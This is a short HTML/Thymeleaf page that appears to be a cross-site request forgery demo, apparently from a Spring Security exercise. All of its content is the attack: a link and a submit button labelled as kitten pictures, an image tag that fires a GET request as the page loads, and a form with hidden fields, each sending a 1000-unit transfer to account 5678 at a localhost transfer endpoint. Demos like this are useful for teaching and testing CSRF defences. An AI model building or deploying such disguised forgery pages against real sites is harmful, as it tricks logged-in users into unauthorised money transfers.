<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:th="http://www.thymeleaf.org"
      xmlns:sec="http://www.thymeleaf.org/thymeleaf-extras-springsecurity3">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<a href="http://localhost:8887/transfer?accountNo=5678&amount=1000">Show Kittens Pictures</a>

<img src="http://localhost:8887/transfer?accountNo=5678&amount=1000"/>

<form action="http://localhost:8887/transfer" method="POST">
    <input name="accountNo" type="hidden" value="5678"/>
    <input name="amount" type="hidden" value="1000"/>
    <input type="submit" value="Show Kittens Picture">
</form>
</body>
</html>